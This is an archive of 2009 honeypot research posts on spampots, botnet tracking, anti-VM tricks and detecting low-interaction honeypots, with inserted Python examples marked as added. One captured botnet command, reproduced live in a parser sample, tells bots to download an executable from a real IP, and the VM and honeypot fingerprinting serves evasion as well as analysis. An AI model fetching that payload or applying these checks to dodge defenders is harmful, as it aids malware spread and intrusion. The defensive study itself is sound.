Archive

Archive for the ‘Honeypot’ Category

Experience on Open Mail Relay Server for Honeypot

by .hac on December 8th, 2009

This is more a report than a discovery in spam collection. I was working on setting up a spampot using spampot.py, which was written by Neale Pickett back in 2003. Although the result was not what I expected, it did give me more information about setting up a spampot.

Goal

The goal of running a spampot (a honeypot that only cares about spam) is to collect spam and analyse its trends, in the hope of finding interesting techniques that spammers and hackers use in junk and phishing emails.

Approach
So far, there are at least two spampot hosting methods that I know of. The names are my own; if there are formal names for them, please let me know.

Open Relay Spampot: This kind of honeypot runs as an open mail relay server. In case you are not familiar with the term, an open relay is an SMTP server that accepts mail from anyone, addressed to any recipient, and forwards it, so anybody on the Internet can send messages through it without authentication. The difference from a real open relay is that a spampot only pretends to relay: it accepts and stores every message and never delivers any of it, otherwise the honeypot itself becomes a spam source.

Closed Relay Spampot: The spampot runs as a closed mail relay, i.e. it only accepts mail addressed to domains it hosts. To expose the server to spammers, you need your own domain pointing to this server, with one or more email addresses exposed to spammers/hackers. For example, we can have onhacks.org pointing to a spampot and spam@onhacks.org as one of the addresses we want to expose. The methods to increase the exposure of an email address are out of scope; we can discuss them later.

In my setup, I decided to run the spampot as an open mail relay server.
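To make the open versus closed relay distinction concrete on the wire, here is an added example in Python. It is not spampot.py and not the author's code. The server answers 250 to MAIL FROM and RCPT TO for any address, exactly as a real open relay would, takes the message, and then stores it instead of delivering it; with open_relay=False it behaves as the closed relay variant and refuses recipients outside its own domains. The hostname smtp.example.invalid, the port 2525 default and the scripted client dialog are assumptions; onhacks.org is the local domain from the post.

```python
"""A minimal SMTP spampot session (added example; this is not spampot.py).

An open-relay probe sends MAIL FROM a foreign address and RCPT TO another
foreign address; a real open relay answers 250 and forwards.  This server
answers 250 too, but the message goes into self.captured and nowhere else.
"""
import socket
from dataclasses import dataclass


@dataclass
class CapturedMessage:
    sender: str
    recipients: list
    data: str


def _address(arg):
    """'FROM:<a@b>' or 'TO:<a@b>' -> 'a@b'."""
    return arg.partition(":")[2].strip().strip("<>")


class SpamPotSession:
    """Drives one SMTP conversation one client line at a time."""

    def __init__(self, open_relay=True, local_domains=("onhacks.org",),
                 hostname="smtp.example.invalid"):   # hostname is an assumption
        self.open_relay = open_relay
        self.local_domains = tuple(d.lower() for d in local_domains)
        self.hostname = hostname
        self.captured = []          # accepted messages; nothing is ever relayed
        self._in_data = False
        self._data = []
        self._reset()

    def _reset(self):
        self.sender = None
        self.recipients = []

    def greeting(self):
        return "220 %s ESMTP ready" % self.hostname

    def handle_line(self, line):
        """Return the reply for one client line, or None while collecting DATA."""
        if self._in_data:
            if line == ".":
                self._in_data = False
                self.captured.append(CapturedMessage(
                    self.sender, list(self.recipients), "\r\n".join(self._data)))
                self._data = []
                self._reset()
                return "250 OK queued"          # the lie that makes it a spampot
            # undo RFC 5321 dot-stuffing
            self._data.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 %s" % self.hostname
        if verb == "MAIL":
            self.sender = _address(arg)
            return "250 OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL first"
            rcpt = _address(arg)
            # open relay: accept anything; closed relay: only our own domains
            if self.open_relay or rcpt.rpartition("@")[2].lower() in self.local_domains:
                self.recipients.append(rcpt)
                return "250 OK"
            return "554 Relay access denied"
        if verb == "DATA":
            if not self.recipients:
                return "503 Need RCPT first"
            self._in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "RSET":
            self._reset()
            return "250 OK"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command not recognized"


def run_dialog(session, client_lines):
    """Replay a scripted client; returns every server reply including the greeting."""
    replies = [session.greeting()]
    for line in client_lines:
        reply = session.handle_line(line)
        if reply is not None:
            replies.append(reply)
    return replies


def serve_forever(bind="0.0.0.0", port=2525, open_relay=True):
    """Serve real connections; use port 25 with the privileges the post describes."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(5)
    while True:
        conn, peer = srv.accept()
        session = SpamPotSession(open_relay=open_relay)
        with conn, conn.makefile("r", encoding="latin-1", newline="\r\n") as rd:
            conn.sendall((session.greeting() + "\r\n").encode())
            for raw in rd:
                reply = session.handle_line(raw.rstrip("\r\n"))
                if reply is not None:
                    conn.sendall((reply + "\r\n").encode())
                    if reply.startswith("221"):
                        break
        for m in session.captured:
            print("%s:%d  %s -> %s  %d bytes" % (peer[0], peer[1], m.sender, m.recipients, len(m.data)))


if __name__ == "__main__":
    # Constructed open-relay probe: foreign sender to foreign recipient.
    s = SpamPotSession()
    print("\n".join(run_dialog(s, ["EHLO probe", "MAIL FROM:<x@evil.test>",
                                    "RCPT TO:<victim@elsewhere.test>", "DATA",
                                    "Subject: test", "", "body", ".", "QUIT"])))
```

The scripted dialog in the main block is the same sequence an open-relay scanner sends, so you can see what "open" looks like to the probe (250 on a foreign recipient) while nothing leaves the box.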

Setup
I have VirtualBox installed on top of Windows 7, with Ubuntu as the guest OS, because the implementation seems to have been done on a *nix system. Since port 25 is the default port for SMTP, we need to forward packets arriving at host (Win7) port 25 to the guest (Ubuntu), so that the spampot in the guest can answer incoming connections on the host's port 25.

(Assuming that you are using NAT networking for VirtualBox.)
To enable port forwarding, map HostPort 25 to GuestPort 25. For more detail on port forwarding in VirtualBox, see the Tombuntu article in the references.

However, you may find that VirtualBox refuses to forward a host port below 1024 (a reserved port). This was easily resolved by running VirtualBox with administrator credentials (i.e. Run As Administrator).

spampot.py requires Sendmail to be installed on Linux. Since sendmail itself is a service listening on port 25, I do the following to switch over to spampot.py:

sudo /etc/init.d/sendmail stop
sudo spampot.py 0.0.0.0

Surely you can set this up to run automatically when the system starts (and stop sendmail from starting at boot, so it does not take port 25 back after a reboot).

The last thing is to add a DNS record pointing to my machine; I have smtp.onhacks.org. pointing to it. Since this is still an experiment, the machine runs at home on a dynamic IP, so I need to change the record often.

Result
Currently I have got 0 messages after running the spampot for a few days. I have googled around and it looks like open relay spampots are not that popular any more: because many server admins are aware that spammers abuse open mail relay servers, they no longer allow open relay. As a result, submitting spam to open relay servers is no longer efficient.

I will continue running the spampot for a few more days and see if we can get more spam through the open relay honeypot. Afterwards, I will work on the closed relay spampot.

Reference

  1. Open mail relay – Wikipedia
  2. spampot.py – written by Neale Pickett
  3. Configure Port Forwarding to a VirtualBox Guest OS – Tombuntu
  4. SpamPots Project – Cert.org
  5. Brazilian Honeypots Alliance

Email, Honeypot, Spampot

Walkthrough on Honeypot Forensics by Honeynet Hong Kong

by log0 on August 31st, 2009

The Hong Kong chapter of the Honeynet Project, led by Peter Cheung and Roland Cheung, has produced two walkthroughs of their high interaction honeypot findings, one for Windows and one for Linux. There are not many detailed walkthroughs out there, and hence I wrote this one. They give a detailed (with images!) walkthrough of how to do forensics on a honeypot. I encourage avid learners to take the step and get something out of them.

Windows

http://www.honeybird.hk/project/wp-content/uploads/2009/04/honeypot-study-windows-2008.pdf

Linux

http://www.honeybird.hk/project/wp-content/uploads/2009/02/honeypot-study-linux-2008.pdf

(Hey.. I really didn't know the Chinese term for forensics...) I got the term from 冰血封情 on EvilOctal: it's 取証. Thanks. =)

Honeypot

Botnet Update In Action

by log0 on August 23rd, 2009

I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen, undetected) malware binaries, and hopefully automated analysis too. =)

Here is something my tool caught while I was testing it on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!

2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]

There is some Deutsch (German) stuff... not necessarily their stuff though. It disconnected me.

ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)

The binary is very new; it was seen just 4 hours ago, at 2009-08-23 18:27:20,644 (GMT+8).

The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum : 7904937c07c031e81023dbd81ac93b64) has VirusTotal results :

File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished

Result: 6/41 (14.63%)

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.08.22 -
AhnLab-V3 5.0.0.2 2009.08.21 -
AntiVir 7.9.1.3 2009.08.21 -
Antiy-AVL 2.0.3.7 2009.08.21 -
Authentium 5.1.2.4 2009.08.22 -
Avast 4.8.1335.0 2009.08.21 -
AVG 8.5.0.406 2009.08.22 Worm/Generic.AHOV
BitDefender 7.2 2009.08.22 -
CAT-QuickHeal 10.00 2009.08.22 -
ClamAV 0.94.1 2009.08.22 -
Comodo 2058 2009.08.22 -
DrWeb 5.0.0.12182 2009.08.22 BackDoor.IRC.Bot.127
eSafe 7.0.17.0 2009.08.20 -
eTrust-Vet 31.6.6694 2009.08.21 -
F-Prot 4.4.4.56 2009.08.22 -
F-Secure 8.0.14470.0 2009.08.21 -
Fortinet 3.120.0.0 2009.08.22 PossibleThreat
GData 19 2009.08.22 -
Ikarus T3.1.1.68.0 2009.08.22 -
Jiangmin 11.0.800 2009.08.21 -
K7AntiVirus 7.10.825 2009.08.22 -
Kaspersky 7.0.0.125 2009.08.22 Net-Worm.Win32.Kolab.dpo
McAfee 5716 2009.08.21 -
McAfee+Artemis 5716 2009.08.21 Artemis!7904937C07C0
McAfee-GW-Edition 6.8.5 2009.08.22 -
Microsoft 1.4903 2009.08.22 -
NOD32 4358 2009.08.22 -
Norman 6.01.09 2009.08.21 -
nProtect 2009.1.8.0 2009.08.22 -
Panda 10.0.0.14 2009.08.22 -
PCTools 4.4.2.0 2009.08.22 -
Prevx 3.0 2009.08.22 Low Risk Adware
Rising 21.43.50.00 2009.08.22 -
Sophos 4.44.0 2009.08.22 -
Sunbelt 3.2.1858.2 2009.08.22 -
Symantec 1.4.4.12 2009.08.22 -
TheHacker 6.3.4.3.385 2009.08.22 -
TrendMicro 8.950.0.1094 2009.08.22 -
VBA32 3.12.10.9 2009.08.22 -
ViRobot 2009.8.22.1897 2009.08.22 -
VirusBuster 4.6.5.0 2009.08.21 -

Detection rate 14.63%! Only 6/41 scanners detected it. Apart from Kaspersky, AVG and DrWeb, the other three seem to give only uncertain, generic results.

Which scanner are you using?
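The bot above takes its orders from the channel topic: the server's 332 numeric carries a "|"-separated list of dot-commands, one of which points at the payload URL. As an added example (not the author's tracking tool), here is the parsing step such a tracker needs: RFC 1459 framing of a raw server line into prefix, command, params and trailing text, extraction of the dot-commands and URLs from a 332/TOPIC/PRIVMSG, and defanging of the URL so the log is not clickable. The sample line is a constructed reconstruction of the one in the post (with the bot nick botnick added, since a real 332 names the recipient); the "." command prefix and "|" separator are what this bot family uses and are assumptions for any other family.

```python
"""Pull bot commands and payload URLs out of an IRC C&C message (added example)."""
import re
from dataclasses import dataclass

# Non-capturing group so findall() returns whole URLs.
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s|]+", re.IGNORECASE)

# Constructed from the topic in the post; botnick is an assumed placeholder.
SAMPLE_LINE = (":irc.efnet.com 332 botnick #xx6 :.flushdns |.down -S |.update -S |"
               ".update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3")


@dataclass
class IrcMessage:
    prefix: str
    command: str
    params: list
    trailing: str


def parse_irc_line(line):
    """Split one server line per RFC 1459: [:prefix] command params [:trailing]."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    body, sep, trailing = line.partition(" :")     # trailing starts at the first " :"
    parts = body.split()
    if not parts:
        raise ValueError("empty IRC line")
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else "")


def defang(url):
    """http://94.76.194.116/x -> hxxp://94[dot]76[dot]194[dot]116/x for safe logging."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.lower().replace("http", "hxxp") + "://" + host.replace(".", "[dot]") + slash + path


def extract_bot_commands(line, separator="|", prefix="."):
    """Return [(command, args, [defanged urls]), ...] from a topic or message line."""
    msg = parse_irc_line(line)
    if msg.command not in ("332", "TOPIC", "PRIVMSG"):
        return []
    commands = []
    for chunk in msg.trailing.split(separator):
        chunk = chunk.strip()
        if not chunk.startswith(prefix):     # this family prefixes commands with "."
            continue
        verb, _, args = chunk.partition(" ")
        urls = [defang(u) for u in URL_RE.findall(args)]
        commands.append((verb, args, urls))
    return commands


if __name__ == "__main__":
    for verb, args, urls in extract_bot_commands(SAMPLE_LINE):
        print("%-10s %-45s %s" % (verb, args, urls))
```

Feeding every line the bot receives through extract_bot_commands() and logging the defanged URLs is what turns a captured binary into the "commands, conversations" output the post describes; the payload URL is then the next sample to fetch and hash.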

(Chinese version, translated:) I am writing an automated tool to track botnets. Given a pile of EXEs, it automatically produces live output from the botnets (commands, conversations, how they work), (possibly undiscovered and undetectable) malicious files, and (hopefully, in future) automated analysis.

This is what my tool caught from a botnet during testing:

Honeypot

Concept of Virtual Machines and Honeypots Detection Techniques

by log0 on August 21st, 2009

In “Who is Hacking Me?“, I mentioned using Nmap to do a service probe on a low interaction honeypot, and I wrote briefly how to do it in my last post. The “How” part is not uninteresting, but it is the “Why” part I’d like to focus on. You know, we hackers know why things are done so, not just how. So,

Why does the methodology work?

First, ask yourself :

How do you tell a human from a computer?

The CAPTCHA solution: you ask the target to recognize some text in an image. If the target passes the test, it is likely human; if not, it is likely a computer. The idea is that computers cannot do image recognition well, and are actually quite bad at it.

Generalizing, we ask the target to do things that only a human can do well and a computer cannot. If the target being tested fails our human test, we conclude with a certain confidence that it is not human.

Well, CAPTCHA distinguishes computers from humans. What about real services and emulated services?

In the same manner, the concept is this: an emulated service and a real service differ technically in their implementation, and that difference makes them distinguishable. By targeting these differences, you get a hint of the identity of the service.

Let’s go through yet another real example. One question people love to ask is:

How do I analyze a malware with anti-virtual-machine technology? It does not run in my vmware! Should I use a physical machine?

Wait, but it runs in my VirtualBox. Oh!

Go download any SdBot online, or any found in the wild. They are normally armed with an anti-VM (anti-virtual-machine) module, which stops the bot from executing if it detects that it is in a VM. You can try that in VMware, specifically VMware. Then go try it in VirtualBox. But save yourself some time, I have tested it already. =)

Wrong question. What you should ask is:

How does the SdBot tell between VMware and a physical machine?

It works because there are technical differences between the implementation of a VM and a physical machine. This is the same idea as emulated services versus real services in the previous article. When I say technical differences, I mean differences in implementation.

Precisely: SdBot running in VirtualBox but not in VMware means that SdBot is not anti-VM but anti-VMware, because it specifically targets VMware, not VirtualBox.

Consider these points :

  • VMware leaves fingerprints a physical machine does not have, such as the registry keys and virtual devices installed with VMware Tools, and the VMware “backdoor” I/O port that answers a magic value.
  • There’s a dhcpd service provided by VMware (for its NAT and host-only networking) which is not generally present on real machines.
  • Some instructions of a physical CPU are not implemented or supported in VMware, or behave differently there.

These techniques are all based on the principle above.

The above also implies something else: anti-VM techniques are specific to certain implementations, so if you use a less common virtual machine implementation (VirtualBox, Xen, etc.) the SdBot WILL execute, because its anti-VM technique does not apply to VirtualBox, Xen, etc. However, there is no guarantee that an anti-VM technique hits only one implementation; it can target the weaknesses of several implementations at once.

So if you have to analyze SdBot in a virtualized environment, you do not need to run it on a physical machine with test automation to take care of the environment. You can create an environment the check does not recognize, or disable the technique, or whatever works. That is how it works behind the scenes, and the same idea applies to honeypots in general. So, happy honeypot hunting!
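As an added example (not from SdBot and not the author's code), the following Python shows the point in code: each check keys on one vendor's artifacts, so an anti-VMware check returns false inside VirtualBox, and a physical machine matches nothing. The artifacts used are the NIC MAC OUIs the virtualisation vendors register and the DMI strings their virtual BIOS reports (on Linux these are readable under /sys/class/dmi/id); those table values are the well-known vendor ones. The three artifact sets at the bottom are constructed, and collect_artifacts() only reads /sys on a Linux guest, returning nothing elsewhere.

```python
"""Implementation-specific VM checks: why anti-VMware passes in VirtualBox (added example)."""
import glob
import os

# MAC address OUIs registered to the virtualisation vendors.
MAC_OUI = {
    "00:05:69": "vmware", "00:0c:29": "vmware", "00:1c:14": "vmware", "00:50:56": "vmware",
    "08:00:27": "virtualbox",
    "00:16:3e": "xen",
}
# Substrings of the DMI sys_vendor / product_name strings the virtual BIOS reports.
DMI_MARKERS = {
    "vmware": ("vmware",),
    "virtualbox": ("virtualbox", "innotek"),
    "xen": ("xen",),
}


def collect_artifacts():
    """Gather what a real check looks at on a Linux guest (read-only; empty elsewhere)."""
    macs = []
    for path in glob.glob("/sys/class/net/*/address"):
        try:
            with open(path) as f:
                macs.append(f.read().strip())
        except OSError:
            pass
    dmi = {}
    for key in ("sys_vendor", "product_name", "bios_vendor"):
        p = os.path.join("/sys/class/dmi/id", key)
        if os.path.exists(p):
            with open(p) as f:
                dmi[key] = f.read().strip()
    return {"macs": macs, "dmi": dmi}


def classify(artifacts):
    """Return the set of hypervisor names the artifacts point at (empty = no verdict)."""
    hits = set()
    for mac in artifacts.get("macs", []):
        oui = mac.lower()[:8]
        if oui in MAC_OUI:
            hits.add(MAC_OUI[oui])
    blob = " ".join(artifacts.get("dmi", {}).values()).lower()
    for vendor, markers in DMI_MARKERS.items():
        if any(m in blob for m in markers):
            hits.add(vendor)
    return hits


def anti_vmware(artifacts):
    """An SdBot-style check: refuse to run only if VMware is detected."""
    return "vmware" in classify(artifacts)


def anti_vm(artifacts):
    """The broader check: any hypervisor we have a signature for."""
    return bool(classify(artifacts))


# Constructed artifact sets for the guests the post compares, plus a physical box.
VMWARE_GUEST = {"macs": ["00:0c:29:3a:5b:1c"],
                "dmi": {"sys_vendor": "VMware, Inc.", "product_name": "VMware Virtual Platform"}}
VBOX_GUEST = {"macs": ["08:00:27:12:34:56"],
              "dmi": {"sys_vendor": "innotek GmbH", "product_name": "VirtualBox"}}
PHYSICAL = {"macs": ["3c:97:0e:aa:bb:cc"],
            "dmi": {"sys_vendor": "LENOVO", "product_name": "ThinkPad X200"}}

if __name__ == "__main__":
    for name, a in (("vmware", VMWARE_GUEST), ("virtualbox", VBOX_GUEST), ("physical", PHYSICAL)):
        print("%-10s anti_vmware=%-5s anti_vm=%s" % (name, anti_vmware(a), anti_vm(a)))
    print("this host:", classify(collect_artifacts()) or "no verdict")
```

The analyst's counter-move follows directly: a guest whose MAC and DMI strings are changed (both are configurable in the hypervisor) matches none of the signatures, which is the "create an environment" option rather than moving to bare metal.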

Honeypot

One Method to Detect Low Interaction Honeypots

by log0 on August 13th, 2009

In “Who is Hacking Me?“, I mentioned using Nmap service probes on the honeypot to yield interesting results.

Here is the scan without service probes (sanitized) :

# Nmap 4.90RC1 scan initiated Sat Jul 11 00:39:13 2009 as: nmap -oN result.sS.txt -v -sS <XXXXXX>

Host <xxxxxx> (aaa.bbb.ccc.ddd) is up (0.092s latency).
Interesting ports on <xxxxxx> (aaa.bbb.ccc.ddd):
Not shown: 550 filtered ports, 434 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
465/tcp  open  smtps
993/tcp  open  imaps
995/tcp  open  pop3s
1023/tcp open  netvenuechat
1025/tcp open  NFS-or-IIS
2103/tcp open  zephyr-clt
2105/tcp open  eklogin
2107/tcp open  unknown
3372/tcp open  msdtc
Read data files from: /usr/local/share/nmap
# Nmap done at Sat Jul 11 00:41:08 2009 -- 1 IP address (1 host up) scanned in 114.52 seconds

Here is the scan with service probes :

# Nmap 4.90RC1 scan initiated Sat Jul 11 00:43:00 2009 as: nmap -oN result.sS.O.sV.txt -O -sV -v -sS <xxxxxx>
Increasing send delay for aaa.bbb.ccc.ddd from 0 to 5 due to 24 out of 79 dropped probes since last increase.
Initiating OS detection (try #1) against <xxxxxx> (aaa.bbb.ccc.ddd)
Retrying OS detection (try #2) against <xxxxxx> (aaa.bbb.ccc.ddd)
Host <xxxxxx> (aaa.bbb.ccc.ddd) is up (0.091s latency).
Interesting ports on <xxxxxx> (aaa.bbb.ccc.ddd):
Not shown: 550 filtered ports, 434 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Nepenthes HoneyTrap fake vulnerable ftpd
22/tcp   open  ssh           OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
25/tcp   open  smtp?
110/tcp  open  pop3?
139/tcp  open  netbios-ssn?
143/tcp  open  imap?
443/tcp  open  ssh           OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
465/tcp  open  smtps?
993/tcp  open  imaps?
995/tcp  open  pop3s?
1023/tcp open  netvenuechat?
1025/tcp open  NFS-or-IIS?
2103/tcp open  zephyr-clt?
2105/tcp open  eklogin?
2107/tcp open  unknown
3372/tcp open  msdtc?
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :


Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Sat Jul 11 00:48:38 2009 -- 1 IP address (1 host up) scanned in 338.94 seconds

Nmap shows a lot of question marks because these services behave differently from every known implementation in its fingerprint database: a trailing “?” means the port is open and returned data, but the responses matched no service fingerprint, so Nmap is only guessing the name from the port number. That is because a low interaction honeypot only emulates part of the target service, and the basic behaviour it lacks makes Nmap’s service probes report the service as unknown. The service probes (-sV) exist to identify the actual software and version behind a port; on a real host most of them resolve. If you see output like this, with a dozen open ports that all answer but cannot be identified, and in this case an FTP banner that literally says “Nepenthes HoneyTrap fake vulnerable ftpd”, this is unlikely to be a real computer but rather emulated services, i.e. a honeypot. Of course, this is just one of the ways, and you can probably think of other ways to accomplish the same.
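The heuristic in the paragraph above, as an added Python example (not the author's tooling and not part of Nmap): parse the PORT/STATE/SERVICE/VERSION table that nmap -oN writes, count open ports whose service name carries Nmap's "?" suffix, and flag the host when most of them are unidentified or when a banner names a known honeypot. SAMPLE_HONEYPOT is the port table from the scan in the post; SAMPLE_REAL is a constructed table for an ordinary mail/web host. The banner list beyond "Nepenthes HoneyTrap", the 5-port minimum and the 50% threshold are assumptions.

```python
"""Heuristic honeypot detector over nmap -sV normal output (added example)."""
import re

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Banner fragments that give a honeypot away outright.  "Nepenthes HoneyTrap"
# is from the scan in the post; the other names are assumptions for illustration.
HONEYPOT_BANNERS = ("nepenthes", "honeytrap", "honeyd", "kippo", "dionaea")

# From the -sV scan in the post.
SAMPLE_HONEYPOT = """\
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Nepenthes HoneyTrap fake vulnerable ftpd
22/tcp   open  ssh           OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
25/tcp   open  smtp?
110/tcp  open  pop3?
139/tcp  open  netbios-ssn?
143/tcp  open  imap?
443/tcp  open  ssh           OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
465/tcp  open  smtps?
993/tcp  open  imaps?
995/tcp  open  pop3s?
1023/tcp open  netvenuechat?
1025/tcp open  NFS-or-IIS?
2103/tcp open  zephyr-clt?
2105/tcp open  eklogin?
2107/tcp open  unknown
3372/tcp open  msdtc?
"""

# Constructed: what a real host with the same kind of services looks like.
SAMPLE_REAL = """\
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
25/tcp  open  smtp     Postfix smtpd
80/tcp  open  http     Apache httpd 2.2.9
143/tcp open  imap     Dovecot imapd
443/tcp open  ssl/http Apache httpd 2.2.9
"""


def parse_nmap_ports(text):
    """Return one dict per port line of nmap -oN style output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue                      # headers, "Not shown:", blank lines
        port, proto, state, service, version = m.groups()
        ports.append({
            "port": int(port), "proto": proto, "state": state,
            "service": service.rstrip("?"),
            "unidentified": service.endswith("?"),   # nmap could not match a fingerprint
            "version": (version or "").strip(),
        })
    return ports


def assess(text, min_open=5, unknown_ratio=0.5):
    """Score one host's -sV output; returns counts and the reasons for the verdict."""
    open_ports = [p for p in parse_nmap_ports(text) if p["state"] == "open"]
    unknown = [p for p in open_ports if p["unidentified"]]
    banner_hits = [p for p in open_ports
                   if any(b in p["version"].lower() for b in HONEYPOT_BANNERS)]
    reasons = []
    if banner_hits:
        reasons.append("honeypot banner on port %s" %
                       ", ".join(str(p["port"]) for p in banner_hits))
    if len(open_ports) >= min_open and len(unknown) / len(open_ports) >= unknown_ratio:
        reasons.append("%d of %d open ports unidentified by service probes"
                       % (len(unknown), len(open_ports)))
    return {"open": len(open_ports), "unknown": len(unknown),
            "banner_hits": len(banner_hits), "likely_honeypot": bool(reasons),
            "reasons": reasons}


if __name__ == "__main__":
    for label, sample in (("post's host", SAMPLE_HONEYPOT), ("real host", SAMPLE_REAL)):
        print(label, assess(sample))
```

The ratio test is the part that still works when the honeypot operator has trimmed the banners; the banner test is the cheap win when they have not.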

Oh yes, this works for other low interaction honeypots besides Nepenthes, too. In my next post, I will talk about VM detection, honeypot detection, and how to analyze malware that does not run in a VM.

http://onhacks.org/lang/zh-hk/2009/07/12/%e8%aa%b0%e5%9c%a8%e5%85%a5%e4%be%b5%e6%88%91%e7%9a%84%e7%b3%bb%e7%b5%b1

Honeypot

Please give me your spam to spam@onhacks.org !

by log0 on August 7th, 2009

Please send me your spam (instant messenger spam, phishing spam, etc.) to spam@onhacks.org.

Yes, we will be reading them!

Thank you.

Email, Honeypot

Who is Hacking Me? ~”Who Will Care” is Wrong~

by log0 on July 26th, 2009

1. Who Wants My Computer
2. The Random Visitors
3. What Can They Attack
4. What Does Antivirus Say
5. Conclusion

In an attempt to answer “Who is Hacking Me?“, we set up a Nepenthes honeypot from July 1st to 25th. This honeypot was never advertised, and we never tried to lure attacks into it, hence we know all these connections are malicious. This computer very much resembles the personal computer you are using at home. This is what your computer sees every day.

1. Who Wants My Computer

Many people believe attackers only want to hack high profile targets such as government agencies, banks, and corporations. After all, there should be nothing on your computer that helps anyone hack into the MSS or FBI, so why would anyone bother?

Alas, this conclusion is purely imaginary.

Your computer is used as a stepping stone for the next attack. When the authorities trace it back, it is you who will get blamed, and your machine serves as a getaway for them. Attackers also store stolen information and other illegal content on your computer, so that the stolen goods do not lie on their own machines. Worse, they steal information from you, such as credit card numbers, email passwords, access to your bank and corporate information, and use it for identity theft such as purchasing illegal goods.

With our honeypot, we shall try to refute some common misbeliefs.

The data is extracted solely from the Nepenthes log. A single event in the log consists of multiple log entries, comprising the start and finish timestamps, the vulnerability triggered, the MD5 and SHA512 hashes of the malware downloaded, the source of the malware, the remote and local IP addresses and ports, and other information.

2. The Random Visitors

A total of 11981 attacks from 115 places around the world were observed over these 25 days. The sources could be proxies or real computers. What is striking is that these attacks know no boundaries, only IP addresses, as witnessed by the diverse places the attacks originated from.

[Figure: attacks by region]

Although Japan accounts for the most attacks, no conclusion can be drawn about their original source or the soundness of the IP addresses logged, but we do know that the attacks are very real and would infect your computer.

3. What Can They Attack

Below is the distribution of ports attacked:

[Figure: ports attacked]

Consistent with the “Who is Hacking Me? ~A Glance into The Log~” report, ports 445, 135, and 139 are the most popular. What is interesting is that port 8581 was also actively probed, ranking 4th. It is not supported by Nepenthes, and all these probes happened on 25th July only. As of this time there is no information on this.

Here are the vulnerabilities probed:

[Figure: vulnerabilities triggered]

The most popular attacks are still the old MS04-007 and the Blaster worm. Note that not all attacks can be distinguished, because Nepenthes does not always receive enough data to tell them apart. The most attacked ports are 445, 135 and 139. With 0-click operating system exploits much rarer now, it is no surprise that the attacked ports still correspond to the common vulnerabilities of years ago.

4. What Does AntiVirus Say

In these attacks, Nepenthes successfully collected 193 binaries of 53 distinct varieties that were sent as payloads to infect the honeypot. We sent these 53 distinct binaries to be scanned by ClamAV and by VirusTotal.

ClamAV information :

$ clamscan -V
ClamAV 0.95.1/9614/Sun Jul 26 10:10:14 2009

Of the 53 binaries, 41 were detected by ClamAV. The 12 binaries undetected by ClamAV were sent through Gmail; none were detected by Gmail’s antivirus scanning. VirusTotal then processed these 12 binaries, and all were detected by some other engine.

Some of the malware types in these 53 binaries detected by ClamAV include :

Trojan.Vanbot-166
Trojan.Mybot-11222
Trojan.Agent-11146
Trojan.Small-4287
Trojan.SdBot-4763
Worm.Padobot.M
Worm.Padobot-13
Worm.Korgo.P
Worm.Dabber.B
Worm.Kolab-366
W32.Virut-9
W32.Virut-11
W32.Virut-54

Unfortunately, there is malware with a lower detection rate, missed by some big names:

MD5  : 4c71b97435a24ffb8fd7fedd1b1790e1
SHA1 : 225476bfa863c5f434f2e485da2ede88f12a53f8
AhnLab-V3    5.0.0.2/20090725    found nothing
AntiVir    7.9.0.228/20090724    found nothing
Antiy-AVL    2.0.3.7/20090724    found nothing
CAT-QuickHeal    10.00/20090725    found nothing
ClamAV    0.94.1/20090725    found nothing
Comodo    1763/20090725    found nothing
eTrust-Vet    31.6.6640/20090725    found nothing
F-Secure    8.0.14470.0/20090724    found nothing
K7AntiVirus    7.10.802/20090725    found nothing
Kaspersky    7.0.0.125/20090725    found nothing
McAfee    5688/20090725    found nothing
McAfee+Artemis    5688/20090725    found nothing
NOD32    4277/20090725    found nothing
Norman    6.01.09/20090724    found nothing
nProtect    2009.1.8.0/20090725    found nothing
PCTools    4.4.2.0/20090725    found nothing
Prevx    3.0/20090725    found nothing
Rising    21.39.52.00/20090725    found nothing
Sophos    4.44.0/20090725    found nothing
TheHacker    6.3.4.3.373/20090724    found nothing
TrendMicro    8.950.0.1094/20090725    found nothing
VBA32    3.12.10.9/20090724    found nothing
